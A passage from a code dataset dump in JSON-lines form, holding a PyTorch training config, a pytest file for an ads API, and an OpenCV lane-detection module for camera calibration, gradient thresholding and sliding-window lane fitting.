"kraken.lib.default_specs.SEGMENTATION_HYPER_PARAMS", "line_number": 616, "usage_type": "attribute"}, {"api_name": "kraken.lib.default_specs", "line_number": 616, "usage_type": "name"}, {"api_name": "kraken.lib.vgsl.TorchVGSLModel.load_model", "line_number": 620, "usage_type": "call"}, {"api_name": "kraken.lib.vgsl.TorchVGSLModel", "line_number": 620, "usage_type": "attribute"}, {"api_name": "kraken.lib.vgsl", "line_number": 620, "usage_type": "name"}, {"api_name": "re.match", "line_number": 639, "usage_type": "call"}, {"api_name": "kraken.lib.models.validate_hyper_parameters", "line_number": 647, "usage_type": "call"}, {"api_name": "kraken.lib.dataset.ImageInputTransforms", "line_number": 653, "usage_type": "call"}, {"api_name": "torch.Tensor", "line_number": 655, "usage_type": "call"}, {"api_name": 
"torch.multiprocessing.get_all_sharing_strategies", "line_number": 661, "usage_type": "call"}, {"api_name": "torch.multiprocessing", "line_number": 661, "usage_type": "attribute"}, {"api_name": "torch.multiprocessing.set_sharing_strategy", "line_number": 663, "usage_type": "call"}, {"api_name": "torch.multiprocessing", "line_number": 663, "usage_type": "attribute"}, {"api_name": "kraken.lib.dataset.BaselineSet", "line_number": 677, "usage_type": "call"}, {"api_name": "kraken.lib.dataset.BaselineSet", "line_number": 692, "usage_type": "call"}, {"api_name": "torch.utils.data.Subset", "line_number": 706, "usage_type": "call"}, {"api_name": "torch.utils.data.Subset", "line_number": 707, "usage_type": "call"}, {"api_name": "torch.utils.data.random_split", "line_number": 714, "usage_type": "call"}, {"api_name": "torch.nn.functional.interpolate", "line_number": 735, "usage_type": "call"}, {"api_name": "torch.nn.functional", "line_number": 735, "usage_type": "name"}, {"api_name": "torch.nn.functional.interpolate", "line_number": 743, "usage_type": "call"}, {"api_name": "torch.nn.functional", "line_number": 743, "usage_type": "name"}, {"api_name": "torch.double", "line_number": 748, "usage_type": "attribute"}, {"api_name": "torch.double", "line_number": 749, "usage_type": "attribute"}, {"api_name": "torch.eq", "line_number": 750, "usage_type": "call"}, {"api_name": "torch.double", "line_number": 750, "usage_type": "attribute"}, {"api_name": "torch.double", "line_number": 751, "usage_type": "attribute"}, {"api_name": "torch.tensor", "line_number": 752, "usage_type": "call"}, {"api_name": "torch.double", "line_number": 752, "usage_type": "attribute"}, {"api_name": "torch.finfo", "line_number": 755, "usage_type": "call"}, {"api_name": "torch.float", "line_number": 755, "usage_type": "attribute"}, {"api_name": "torch.stack", "line_number": 757, "usage_type": "call"}, {"api_name": "torch.stack", "line_number": 758, "usage_type": "call"}, {"api_name": "torch.stack", "line_number": 759, "usage_type": "call"}, {"api_name": "torch.stack", "line_number": 760, "usage_type": "call"}, {"api_name": "torch.stack", "line_number": 761, "usage_type": "call"}, {"api_name": "torch.mean", "line_number": 767, "usage_type": "call"}, {"api_name": "torch.mean", "line_number": 769, "usage_type": "call"}, {"api_name": "torch.sum", "line_number": 770, "usage_type": "call"}, {"api_name": "typing.Optional", "line_number": 784, "usage_type": "name"}, {"api_name": "kraken.lib.vgsl.TorchVGSLModel", "line_number": 790, "usage_type": "call"}, {"api_name": "kraken.lib.vgsl", "line_number": 790, "usage_type": "name"}, {"api_name": "numpy.inf", "line_number": 837, "usage_type": "attribute"}, {"api_name": "numpy.inf", "line_number": 838, "usage_type": "attribute"}, {"api_name": "torch.set_num_threads", "line_number": 902, "usage_type": "call"}, {"api_name": "torch.utils.data.DataLoader", "line_number": 905, "usage_type": "call"}, {"api_name": "torch.utils.data.DataLoader", "line_number": 912, "usage_type": "call"}, {"api_name": "pytorch_lightning.callbacks.EarlyStopping", "line_number": 921, "usage_type": "call"}, {"api_name": "torch.optim.lr_scheduler.OneCycleLR", "line_number": 956, "usage_type": "attribute"}, {"api_name": "torch.optim.lr_scheduler", "line_number": 956, "usage_type": "name"}, {"api_name": "torch.optim.Adam", "line_number": 967, "usage_type": "call"}, {"api_name": "torch.optim", "line_number": 967, "usage_type": "attribute"}, {"api_name": "torch.optim", "line_number": 969, "usage_type": "attribute"}, {"api_name": 
"torch.optim.lr_scheduler.ExponentialLR", "line_number": 975, "usage_type": "call"}, {"api_name": "torch.optim.lr_scheduler", "line_number": 975, "usage_type": "name"}, {"api_name": "torch.optim.lr_scheduler.CosineAnnealingLR", "line_number": 978, "usage_type": "call"}, {"api_name": "torch.optim.lr_scheduler", "line_number": 978, "usage_type": "name"}, {"api_name": "torch.optim.lr_scheduler.StepLR", "line_number": 981, "usage_type": "call"}, {"api_name": "torch.optim.lr_scheduler", "line_number": 981, "usage_type": "name"}, {"api_name": "torch.optim.lr_scheduler.ReduceLROnPlateau", "line_number": 984, "usage_type": "call"}, {"api_name": "torch.optim.lr_scheduler", "line_number": 984, "usage_type": "name"}, {"api_name": "torch.optim.lr_scheduler.OneCycleLR", "line_number": 995, "usage_type": "call"}, {"api_name": "torch.optim.lr_scheduler", "line_number": 995, "usage_type": "name"}]}
+{"seq_id": "270541196", "text": "#!/usr/bin/env python\n# -*- encoding: utf-8 -*-\nimport os\nfrom pathlib import Path\n\nBATCH_SIZE = 128\nIMG_SIZE = 224\nNUM_CLS = 1000\n\n# resnet 18\nmodel = dict(\n type='VanillaResNet',\n block_type='ResNetBottleneck',\n layers=[3, 4, 6, 3],\n num_cls=NUM_CLS\n)\n\ntrain_data = dict(\n dataset=dict(\n type='CIFAR10Dataset',\n root=Path(os.environ['DATA']),\n transform_pipeline=[\n dict(type='RandomResizedCrop', size=IMG_SIZE),\n dict(type='RandomHorizontalFlip'),\n dict(type='ToTensor'),\n dict(type='Normalize', mean=(0.5, 0.5, 0.5), std=(0.5, 0.5, 0.5))\n ]\n ),\n dataloader=dict(\n batch_size=64,\n pin_memory=True,\n num_workers=4,\n sampler=dict(\n type='DataParallelSampler',\n shuffle=True,\n )\n )\n)\n\ntest_data = dict(\n dataset=dict(\n type='CIFAR10Dataset',\n root=Path(os.environ['DATA']),\n train=False,\n transform_pipeline=[\n dict(type='Resize', size=(IMG_SIZE, IMG_SIZE)),\n dict(type='ToTensor'),\n dict(type='Normalize', mean=(0.5, 0.5, 0.5), std=(0.5, 0.5, 0.5))\n ]\n ),\n dataloader=dict(\n batch_size=BATCH_SIZE,\n pin_memory=True,\n num_workers=4,\n )\n)\n\ndist_initializer = [\n dict(type='DataParallelInitializer'),\n]\n\nparallelization = dict(\n pipeline=1,\n tensor=1,\n sequence=-1\n)\n\noptimizer = dict(\n type='Adam',\n lr=0.01\n)\n\nloss = dict(\n type='CrossEntropyLoss'\n)\n\ntrainer = dict(\n max_epochs=5,\n max_iters=1000\n)\n\namp = dict(\n fp16=None,\n)\n\nlevel = 2\n\nparallel = dict(\n pipeline=dict(size=1),\n tensor=dict(size=1, mode=None)\n)\n", "sub_path": "tests/test_zero_data_parallel/config.py", "file_name": "config.py", "file_ext": "py", "file_size_in_byte": 1704, "program_lang": "python", "lang": "en", "doc_type": "code", "dataset": "code-starcoder2", "pt": "14", "api": [{"api_name": "pathlib.Path", "line_number": 21, "usage_type": "call"}, {"api_name": "os.environ", "line_number": 21, "usage_type": "attribute"}, {"api_name": "pathlib.Path", "line_number": 43, "usage_type": "call"}, {"api_name": "os.environ", "line_number": 43, "usage_type": "attribute"}]}
+{"seq_id": "113244271", "text": "__author__ = 'jkf'\n\nimport json\n\nfrom adengine.model import User, Ad, Comment\n\n\ndef build_api_url(id_=None):\n if id_ is not None:\n return \"/api/ads/{}\".format(id_)\n return \"/api/ads\"\n\n\ndef _add_resource(session, resource):\n session.add(resource)\n session.commit()\n return resource\n\n\ndef _new_ad(user, text=\"ad-text\"):\n ad = Ad(text=text, author_id=user.id)\n return ad\n\n\ndef _new_user(name='Peter'):\n user = User(email='{name}@example.com'.format(name=name),\n name=name,\n username=name,\n password_hash='12346')\n return user\n\n\ndef _new_comment(ad, user, text='bla-bla-bla'):\n comment = Comment(text=text,\n ad_id=ad.id,\n author_id=user.id)\n return comment\n\n\ndef test_comments_refers_both_ad_and_user(session, client):\n \"Ensure comments added are referneced from the Ad\"\n # given\n user = _add_resource(session, _new_user(name='PeterGeneralUser'))\n user1 = _add_resource(session, _new_user(name='PeterGeneralUserGrant'))\n ad = _add_resource(session, _new_ad(user, text=\"ad1-text1\"))\n _add_resource(session, _new_comment(ad, user, text=\"ad11-text1\"))\n _add_resource(session, _new_comment(ad, user1, text=\"ad12-text1\"))\n\n # exercise\n result = client.get(build_api_url()).data\n doc = json.loads(result)\n\n # verify\n ads_dicts = doc.get(\"objects\")\n assert 1 == len(ads_dicts), \"Expected only one advertisement.\"\n assert \"ad1-text1\" == ads_dicts[0].get('text')\n", "sub_path": "tests/views/test_ads.py", "file_name": "test_ads.py", "file_ext": "py", "file_size_in_byte": 1519, "program_lang": "python", "lang": "en", "doc_type": "code", "dataset": "code-starcoder2", "pt": "14", "api": [{"api_name": "adengine.model.Ad", "line_number": 21, "usage_type": "call"}, {"api_name": "adengine.model.User", "line_number": 26, "usage_type": "call"}, {"api_name": "adengine.model.Comment", "line_number": 34, "usage_type": "call"}, {"api_name": "json.loads", "line_number": 51, "usage_type": "call"}]}
+{"seq_id": "45264770", "text": "import pickle\nimport cv2\nimport numpy as np\nimport matplotlib.pyplot as plt\nimport matplotlib.image as mpimg\nimport glob\n\ndef camera_calibrate(cal_images, nx=9, ny=6):\n '''\n camera_calibrate finds camera calibration parameters\n :param cal_images:\n :param nx: number of squares in width of checkerboard\n :param ny: number of square in height of checkerboard\n :return:\n '''\n # prepare object points, like (0,0,0), (1,0,0), (2,0,0) ....,(6,5,0)\n objp = np.zeros((nx*ny,3), np.float32)\n objp[:,:2] = np.mgrid[0:nx,0:ny].T.reshape(-1, 2)\n\n # Arrays to store object points and image points from all the images.\n objpoints = [] # 3d points in real world space\n imgpoints = [] # 2d points in image plane.\n\n # Step through the list and search for chessboard corners\n for idx, fname in enumerate(cal_images):\n img = cv2.imread(fname)\n gray = cv2.cvtColor(img, cv2.COLOR_BGR2GRAY)\n\n # Find the chessboard corners\n ret, corners = cv2.findChessboardCorners(gray, (nx,ny), None)\n\n # If found, add object points, image points\n if ret == True:\n objpoints.append(objp)\n imgpoints.append(corners)\n\n ret, mtx, dist, rvecs, tvecs = cv2.calibrateCamera(objpoints, imgpoints, gray.shape[::-1], None, None)\n\n return mtx, dist\n\ndef camera_setup(calibration_path='camera_cal/calibration*.jpg', nx=9, ny=6):\n '''\n camera_setup sets up calibration images and returns camera calibration results\n :param calibration_path:\n :param nx: number of squares in width of checkerboard\n :param ny: number of square in height of checkerboard\n :return:\n '''\n # Make a list of calibration images\n cal_images = glob.glob(calibration_path)\n cam_mtx, cam_dist = camera_calibrate(cal_images, nx, ny)\n return cam_mtx, cam_dist\n\ndef cal_undistort(img, mtx, dist):\n '''\n cal_undistort undistorts images\n :param img:\n :param objpoints:\n :param imgpoints:\n :return:\n '''\n # Use cv2.calibrateCamera() and cv2.undistort()\n #gray = cv2.cvtColor(img,cv2.COLOR_BGR2GRAY)\n #ret, corners = cv2.findChessboardCorners(gray, (8,6), None)\n undist = cv2.undistort(img, mtx, dist, None, mtx)\n #undist = np.copy(img) # Delete this line\n return undist\n\n# Define a function that takes an image, number of x and y points,\n# camera matrix and distortion coefficients\ndef corners_unwarp(img, nx, ny, mtx, dist):\n # Use the OpenCV undistort() function to remove distortion\n undist = cv2.undistort(img, mtx, dist, None, mtx)\n # Convert undistorted image to grayscale\n gray = cv2.cvtColor(undist, cv2.COLOR_BGR2GRAY)\n # Search for corners in the grayscaled image\n ret, corners = cv2.findChessboardCorners(gray, (nx, ny), None)\n\n if ret == True:\n # If we found corners, draw them! 
(just for fun)\n cv2.drawChessboardCorners(undist, (nx, ny), corners, ret)\n # Choose offset from image corners to plot detected corners\n # This should be chosen to present the result at the proper aspect ratio\n # My choice of 100 pixels is not exact, but close enough for our purpose here\n offset = 100 # offset for dst points\n # Grab the image shape\n img_size = (gray.shape[1], gray.shape[0])\n\n # For source points I'm grabbing the outer four detected corners\n src = np.float32([corners[0], corners[nx-1], corners[-1], corners[-nx]])\n # For destination points, I'm arbitrarily choosing some points to be\n # a nice fit for displaying our warped result\n # again, not exact, but close enough for our purposes\n dst = np.float32([[offset, offset], [img_size[0]-offset, offset],\n [img_size[0]-offset, img_size[1]-offset],\n [offset, img_size[1]-offset]])\n # Given src and dst points, calculate the perspective transform matrix\n M = cv2.getPerspectiveTransform(src, dst)\n # Warp the image using OpenCV warpPerspective()\n warped = cv2.warpPerspective(undist, M, img_size)\n\n # Return the resulting image and matrix\n return warped, M\n\n# Define a function that takes an image, gradient orientation,\n# and threshold min / max values.\ndef abs_sobel_thresh(img, orient='x', thresh_min=0, thresh_max=255, sobel_kernel = 3):\n # Convert to grayscale\n gray = cv2.cvtColor(img, cv2.COLOR_RGB2GRAY)\n # Apply x or y gradient with the OpenCV Sobel() function\n # and take the absolute value\n if orient == 'x':\n abs_sobel = np.absolute(cv2.Sobel(gray, cv2.CV_64F, 1, 0, ksize=sobel_kernel))\n if orient == 'y':\n abs_sobel = np.absolute(cv2.Sobel(gray, cv2.CV_64F, 0, 1, ksize=sobel_kernel))\n # Rescale back to 8 bit integer\n scaled_sobel = np.uint8(255*abs_sobel/np.max(abs_sobel))\n # Create a copy and apply the threshold\n binary_output = np.zeros_like(scaled_sobel)\n # Here I'm using inclusive (>=, <=) thresholds, but exclusive is ok too\n binary_output[(scaled_sobel >= thresh_min) & (scaled_sobel <= thresh_max)] = 1\n\n # Return the result\n return binary_output\n\n# Define a function to return the magnitude of the gradient\n# for a given sobel kernel size and threshold values\ndef mag_thresh(img, sobel_kernel=3, mag_thresh=(0, 255)):\n # Convert to grayscale\n gray = cv2.cvtColor(img, cv2.COLOR_RGB2GRAY)\n # Take both Sobel x and y gradients\n sobelx = cv2.Sobel(gray, cv2.CV_64F, 1, 0, ksize=sobel_kernel)\n sobely = cv2.Sobel(gray, cv2.CV_64F, 0, 1, ksize=sobel_kernel)\n # Calculate the gradient magnitude\n gradmag = np.sqrt(sobelx**2 + sobely**2)\n # Rescale to 8 bit\n scale_factor = np.max(gradmag)/255\n gradmag = (gradmag/scale_factor).astype(np.uint8)\n # Create a binary image of ones where threshold is met, zeros otherwise\n binary_output = np.zeros_like(gradmag)\n binary_output[(gradmag >= mag_thresh[0]) & (gradmag <= mag_thresh[1])] = 1\n\n # Return the binary image\n return binary_output\n\n# Define a function to threshold an image for a given range and Sobel kernel\ndef dir_threshold(img, sobel_kernel=3, thresh=(0, np.pi/2)):\n # Grayscale\n gray = cv2.cvtColor(img, cv2.COLOR_RGB2GRAY)\n # Calculate the x and y gradients\n sobelx = cv2.Sobel(gray, cv2.CV_64F, 1, 0, ksize=sobel_kernel)\n sobely = cv2.Sobel(gray, cv2.CV_64F, 0, 1, ksize=sobel_kernel)\n # Take the absolute value of the gradient direction,\n # apply a threshold, and create a binary image result\n absgraddir = np.arctan2(np.absolute(sobely), np.absolute(sobelx))\n binary_output = np.zeros_like(absgraddir)\n binary_output[(absgraddir 
>= thresh[0]) & (absgraddir <= thresh[1])] = 1\n\n # Return the binary image\n return binary_output\n\ndef color_threshold(img, channel=2, s_thresh=(170, 255)):\n # Convert to HLS color space and separate out the selected channel (S by default)\n hsv = cv2.cvtColor(img, cv2.COLOR_RGB2HLS).astype(np.float)\n s_channel = hsv[:, :, channel]\n\n # Threshold color channel\n s_binary = np.zeros_like(s_channel)\n s_binary[(s_channel >= s_thresh[0]) & (s_channel <= s_thresh[1])] = 1\n\n return s_binary\n\ndef pipeline(img, s_thresh=(170, 255), sx_thresh=(20, 100)):\n img = np.copy(img)\n\n # gradient\n ksize = 3 # Choose a larger odd number to smooth gradient measurements\n gradx = abs_sobel_thresh(img, orient='x', thresh_min=sx_thresh[0], thresh_max=sx_thresh[1], sobel_kernel=ksize)\n grady = abs_sobel_thresh(img, orient='y', thresh_min=sx_thresh[0], thresh_max=sx_thresh[1], sobel_kernel=ksize)\n\n # color\n s_binary = color_threshold(img, 2, s_thresh)\n color_binary = np.dstack((np.zeros_like(gradx), gradx, s_binary))\n\n # mag and dir\n mag_binary = mag_thresh(img, sobel_kernel=ksize, mag_thresh=(0, 255))\n dir_binary = dir_threshold(img, sobel_kernel=ksize, thresh=(0, np.pi / 2))\n\n combined_binary = np.zeros_like(dir_binary)\n combined_binary[(s_binary == 1)|((gradx == 1) & (grady == 1))]=255# | ((mag_binary == 1) & (dir_binary == 1))] = 1\n\n return color_binary, combined_binary\n\ndef window_mask(width, height, img_ref, center, level):\n output = np.zeros_like(img_ref)\n output[int(img_ref.shape[0] - (level + 1) * height):int(img_ref.shape[0] - level * height),\n max(0, int(center - width / 2)):min(int(center + width / 2), img_ref.shape[1])] = 1\n return output\n\ndef find_window_centroids(warped, window_width, window_height, margin):\n window_centroids = [] # Store the (left,right) window centroid positions per level\n window = np.ones(window_width) # Create our window template that we will use for convolutions\n\n # First find the two starting positions for the left and right lane by using np.sum to get the vertical image slice\n # and then np.convolve the vertical image slice with the window template\n\n # Sum quarter bottom of image to get slice, could use a different ratio\n l_sum = np.sum(warped[int(3 * warped.shape[0] / 4):, :int(warped.shape[1] / 2)], axis=0)\n l_center = np.argmax(np.convolve(window, l_sum)) - window_width / 2\n r_sum = np.sum(warped[int(3 * warped.shape[0] / 4):, int(warped.shape[1] / 2):], axis=0)\n r_center = np.argmax(np.convolve(window, r_sum)) - window_width / 2 + int(warped.shape[1] / 2)\n\n # Add what we found for the first layer\n window_centroids.append((l_center, r_center))\n\ndef get_perspective_transform(image, src_in = None, dst_in = None):\n img_size = image.shape\n a = 60\n b = 10\n d = 100\n if src_in is None:\n src_out = np.array([[(img_size[1]/2) - a, (img_size[0]/2) + d],\n [(img_size[1]/6) - b, img_size[0]],\n [(img_size[1]*5/6)+a-b, img_size[0]],\n [(img_size[1]/2)+a+0.5*b, (img_size[0]/2) + d]], np.float32)\n else:\n src_out = src_in\n\n if dst_in is None:\n dst_out = np.array([[(img_size[1]/4), 0],\n [(img_size[1]/4), img_size[0]],\n [(img_size[1]*3/4), img_size[0]],\n [(img_size[1]*3/4), 0]], np.float32)\n\n else:\n dst_out = dst_in\n\n warp_m = cv2.getPerspectiveTransform(src_out, dst_out)\n warp_minv = cv2.getPerspectiveTransform(dst_out, src_out)\n\n return src_out, dst_out, warp_m, warp_minv\n\ndef generate_plot(binary_warped, left_fit, right_fit, line=None):\n # Generate x and y values for plotting\n ploty = np.linspace(0, binary_warped.shape[0] - 1, 
binary_warped.shape[0])\n left_fitx = left_fit[0] * ploty ** 2 + left_fit[1] * ploty + left_fit[2]\n right_fitx = right_fit[0] * ploty ** 2 + right_fit[1] * ploty + right_fit[2]\n\n return left_fitx, right_fitx, ploty\n\n\ndef get_lane_lines(binary_warped):\n # Assuming you have created a warped binary image called \"binary_warped\"\n # Take a histogram of the bottom half of the image\n histogram = np.sum(binary_warped[np.int(binary_warped.shape[0] / 2):, :], axis=0)\n # Create an output image to draw on and visualize the result\n out_img = np.dstack((binary_warped, binary_warped, binary_warped)) * 255\n # Find the peak of the left and right halves of the histogram\n # These will be the starting point for the left and right lines\n midpoint = np.int(histogram.shape[0] / 2)\n leftx_base = np.argmax(histogram[:midpoint])\n rightx_base = np.argmax(histogram[midpoint:]) + midpoint\n\n # Choose the number of sliding windows\n nwindows = 9\n # Set height of windows\n window_height = np.int(binary_warped.shape[0] / nwindows)\n # Identify the x and y positions of all nonzero pixels in the image\n nonzero = binary_warped.nonzero()\n nonzeroy = np.array(nonzero[0])\n nonzerox = np.array(nonzero[1])\n # Current positions to be updated for each window\n leftx_current = leftx_base\n rightx_current = rightx_base\n # Set the width of the windows +/- margin\n margin = 100\n # Set minimum number of pixels found to recenter window\n minpix = 50\n # Create empty lists to receive left and right lane pixel indices\n left_lane_inds = []\n right_lane_inds = []\n\n # Step through the windows one by one\n for window in range(nwindows):\n # Identify window boundaries in x and y (and right and left)\n win_y_low = binary_warped.shape[0] - (window + 1) * window_height\n win_y_high = binary_warped.shape[0] - window * window_height\n win_xleft_low = leftx_current - margin\n win_xleft_high = leftx_current + margin\n win_xright_low = rightx_current - margin\n win_xright_high = rightx_current + margin\n # Draw the windows on the visualization image\n cv2.rectangle(out_img, (win_xleft_low, win_y_low), (win_xleft_high, win_y_high), (0, 255, 0), 2)\n cv2.rectangle(out_img, (win_xright_low, win_y_low), (win_xright_high, win_y_high), (0, 255, 0), 2)\n # Identify the nonzero pixels in x and y within the window\n good_left_inds = ((nonzeroy >= win_y_low) & (nonzeroy < win_y_high) & (nonzerox >= win_xleft_low) & (\n nonzerox < win_xleft_high)).nonzero()[0]\n good_right_inds = ((nonzeroy >= win_y_low) & (nonzeroy < win_y_high) & (nonzerox >= win_xright_low) & (\n nonzerox < win_xright_high)).nonzero()[0]\n # Append these indices to the lists\n left_lane_inds.append(good_left_inds)\n right_lane_inds.append(good_right_inds)\n # If you found > minpix pixels, recenter next window on their mean position\n if len(good_left_inds) > minpix:\n leftx_current = np.int(np.mean(nonzerox[good_left_inds]))\n if len(good_right_inds) > minpix:\n rightx_current = np.int(np.mean(nonzerox[good_right_inds]))\n\n # Concatenate the arrays of indices\n left_lane_inds = np.concatenate(left_lane_inds)\n right_lane_inds = np.concatenate(right_lane_inds)\n\n # Extract left and right line pixel positions\n leftx = nonzerox[left_lane_inds]\n lefty = nonzeroy[left_lane_inds]\n rightx = nonzerox[right_lane_inds]\n righty = nonzeroy[right_lane_inds]\n\n # Fit a second order polynomial to each\n left_fit = np.polyfit(lefty, leftx, 2)\n right_fit = np.polyfit(righty, rightx, 2)\n\n # Generate x and y values for plotting\n left_fitx, right_fitx, ploty = 
generate_plot(binary_warped, left_fit, right_fit)\n\n out_img[nonzeroy[left_lane_inds], nonzerox[left_lane_inds]] = [255, 0, 0]\n out_img[nonzeroy[right_lane_inds], nonzerox[right_lane_inds]] = [0, 0, 255]\n\n return left_fit, right_fit, left_fitx, right_fitx, ploty, out_img\n\ndef get_lane_lines_with_prior(binary_warped, left_fit, right_fit):\n # Assume you now have a new warped binary image\n # from the next frame of video (also called \"binary_warped\")\n # It's now much easier to find line pixels!\n nonzero = binary_warped.nonzero()\n nonzeroy = np.array(nonzero[0])\n nonzerox = np.array(nonzero[1])\n margin = 150\n left_lane_inds = ((nonzerox > (left_fit[0] * (nonzeroy ** 2) + left_fit[1] * nonzeroy + left_fit[2] - margin)) & (\n nonzerox < (left_fit[0] * (nonzeroy ** 2) + left_fit[1] * nonzeroy + left_fit[2] + margin)))\n right_lane_inds = (\n (nonzerox > (right_fit[0] * (nonzeroy ** 2) + right_fit[1] * nonzeroy + right_fit[2] - margin)) & (\n nonzerox < (right_fit[0] * (nonzeroy ** 2) + right_fit[1] * nonzeroy + right_fit[2] + margin)))\n\n # Again, extract left and right line pixel positions\n leftx = nonzerox[left_lane_inds]\n lefty = nonzeroy[left_lane_inds]\n rightx = nonzerox[right_lane_inds]\n righty = nonzeroy[right_lane_inds]\n # Fit a second order polynomial to each\n left_fit = np.polyfit(lefty, leftx, 2)\n right_fit = np.polyfit(righty, rightx, 2)\n # Generate x and y values for plotting\n ploty = np.linspace(0, binary_warped.shape[0] - 1, binary_warped.shape[0])\n left_fitx = left_fit[0] * ploty ** 2 + left_fit[1] * ploty + left_fit[2]\n right_fitx = right_fit[0] * ploty ** 2 + right_fit[1] * ploty + right_fit[2]\n\n # Create an image to draw on and an image to show the selection window\n out_img = np.dstack((binary_warped, binary_warped, binary_warped)) * 255\n window_img = np.zeros_like(out_img)\n # Color in left and right line pixels\n out_img[nonzeroy[left_lane_inds], nonzerox[left_lane_inds]] = [255, 0, 0]\n out_img[nonzeroy[right_lane_inds], nonzerox[right_lane_inds]] = [0, 0, 255]\n\n # Generate a polygon to illustrate the search window area\n # And recast the x and y points into usable format for cv2.fillPoly()\n left_line_window1 = np.array([np.transpose(np.vstack([left_fitx - margin, ploty]))])\n left_line_window2 = np.array([np.flipud(np.transpose(np.vstack([left_fitx + margin, ploty])))])\n left_line_pts = np.hstack((left_line_window1, left_line_window2))\n right_line_window1 = np.array([np.transpose(np.vstack([right_fitx - margin, ploty]))])\n right_line_window2 = np.array([np.flipud(np.transpose(np.vstack([right_fitx + margin, ploty])))])\n right_line_pts = np.hstack((right_line_window1, right_line_window2))\n\n # Draw the lane onto the warped blank image\n cv2.fillPoly(window_img, np.int_([left_line_pts]), (0, 255, 0))\n cv2.fillPoly(window_img, np.int_([right_line_pts]), (0, 255, 0))\n result = cv2.addWeighted(out_img, 1, window_img, 0.3, 0)\n plt.imshow(result)\n plt.plot(left_fitx, ploty, color='yellow')\n plt.plot(right_fitx, ploty, color='yellow')\n plt.xlim(0, 1280)\n plt.ylim(720, 0)\n\n # Create an image to draw on and an image to show the selection window\n out_img = np.dstack((binary_warped, binary_warped, binary_warped)) * 255\n window_img = np.zeros_like(out_img)\n # Color in left and right line pixels\n out_img[nonzeroy[left_lane_inds], nonzerox[left_lane_inds]] = [255, 0, 0]\n out_img[nonzeroy[right_lane_inds], nonzerox[right_lane_inds]] = [0, 0, 255]\n\n # Generate a polygon to illustrate the search window area\n # And recast the x and y 
points into usable format for cv2.fillPoly()\n left_line_window1 = np.array([np.transpose(np.vstack([left_fitx - margin, ploty]))])\n left_line_window2 = np.array([np.flipud(np.transpose(np.vstack([left_fitx + margin, ploty])))])\n left_line_pts = np.hstack((left_line_window1, left_line_window2))\n right_line_window1 = np.array([np.transpose(np.vstack([right_fitx - margin, ploty]))])\n right_line_window2 = np.array([np.flipud(np.transpose(np.vstack([right_fitx + margin, ploty])))])\n right_line_pts = np.hstack((right_line_window1, right_line_window2))\n\n # Draw the lane onto the warped blank image\n cv2.fillPoly(window_img, np.int_([left_line_pts]), (0, 255, 0))\n cv2.fillPoly(window_img, np.int_([right_line_pts]), (0, 255, 0))\n result = cv2.addWeighted(out_img, 1, window_img, 0.3, 0)\n\n return left_fit, right_fit, left_fitx, right_fitx, ploty, result\n\ndef window_mask(width, height, img_ref, center, level):\n output = np.zeros_like(img_ref)\n output[int(img_ref.shape[0] - (level + 1) * height):int(img_ref.shape[0] - level * height),\n max(0, int(center - width / 2)):min(int(center + width / 2), img_ref.shape[1])] = 1\n return output\n\n\ndef find_window_centroids(warped, window_width, window_height, margin):\n window_centroids = [] # Store the (left,right) window centroid positions per level\n window = np.ones(window_width) # Create our window template that we will use for convolutions\n\n # First find the two starting positions for the left and right lane by using np.sum to get the vertical image slice\n # and then np.convolve the vertical image slice with the window template\n\n # Sum quarter bottom of image to get slice, could use a different ratio\n l_sum = np.sum(warped[int(3 * warped.shape[0] / 4):, :int(warped.shape[1] / 2)], axis=0)\n l_center = np.argmax(np.convolve(window, l_sum)) - window_width / 2\n r_sum = np.sum(warped[int(3 * warped.shape[0] / 4):, int(warped.shape[1] / 2):], axis=0)\n r_center = np.argmax(np.convolve(window, r_sum)) - window_width / 2 + int(warped.shape[1] / 2)\n\n # Add what we found for the first layer\n window_centroids.append((l_center, r_center))\n\n # Go through each layer looking for max pixel locations\n for level in range(1, (int)(warped.shape[0] / window_height)):\n # convolve the window into the vertical slice of the image\n image_layer = np.sum(\n warped[int(warped.shape[0] - (level + 1) * window_height):int(warped.shape[0] - level * window_height), :],\n axis=0)\n conv_signal = np.convolve(window, image_layer)\n # Find the best left centroid by using past left center as a reference\n # Use window_width/2 as offset because convolution signal reference is at right side of window, not center of window\n offset = window_width / 2\n l_min_index = int(max(l_center + offset - margin, 0))\n l_max_index = int(min(l_center + offset + margin, warped.shape[1]))\n l_center = np.argmax(conv_signal[l_min_index:l_max_index]) + l_min_index - offset\n # Find the best right centroid by using past right center as a reference\n r_min_index = int(max(r_center + offset - margin, 0))\n r_max_index = int(min(r_center + offset + margin, warped.shape[1]))\n r_center = np.argmax(conv_signal[r_min_index:r_max_index]) + r_min_index - offset\n # Add what we found for that layer\n window_centroids.append((l_center, r_center))\n\n return window_centroids\n\ndef sliding_window_convolution(warped):\n # window settings\n window_width = 50\n window_height = 80 # Break image into 9 vertical layers since image height is 720\n margin = 100 # How much to slide left and right for 
searching\n\n window_centroids = find_window_centroids(warped, window_width, window_height, margin)\n\n # If we found any window centers\n if len(window_centroids) > 0:\n\n # Points used to draw all the left and right windows\n l_points = np.zeros_like(warped)\n r_points = np.zeros_like(warped)\n\n # Go through each level and draw the windows\n for level in range(0, len(window_centroids)):\n # Window_mask is a function to draw window areas\n l_mask = window_mask(window_width, window_height, warped, window_centroids[level][0], level)\n r_mask = window_mask(window_width, window_height, warped, window_centroids[level][1], level)\n # Add graphic points from window mask here to total pixels found\n l_points[(l_points == 255) | ((l_mask == 1))] = 255\n r_points[(r_points == 255) | ((r_mask == 1))] = 255\n\n # Draw the results\n template = np.array(r_points + l_points, np.uint8) # add both left and right window pixels together\n zero_channel = np.zeros_like(template) # create a zero color channel\n template = np.array(cv2.merge((zero_channel, template, zero_channel)), np.uint8) # make window pixels green\n warpage = np.array(cv2.merge((warped, warped, warped)),\n np.uint8) # making the original road pixels 3 color channels\n output = cv2.addWeighted(warpage, 1, template, 0.5, 0.0) # overlay the original road image with window results\n\n # If no window centers found, just display original road image\n else:\n output = np.array(cv2.merge((warped, warped, warped)), np.uint8)\n\n return output\n\ndef get_curvature(ploty, left_fit, right_fit, leftx, rightx, xm_per_pix = 3.7 / 700, ym_per_pix= 30 / 720):\n # Define y-value where we want radius of curvature\n # I'll choose the maximum y-value, corresponding to the bottom of the image\n y_eval = np.max(ploty)\n #left_curverad = ((1 + (2 * left_fit[0] * y_eval + left_fit[1]) ** 2) ** 1.5) / np.absolute(2 * left_fit[0])\n #right_curverad = ((1 + (2 * right_fit[0] * y_eval + right_fit[1]) ** 2) ** 1.5) / np.absolute(2 * right_fit[0])\n #print(left_curverad, right_curverad)\n # Example values: 1926.74 1908.48\n\n # Define conversions in x and y from pixels space to meters\n 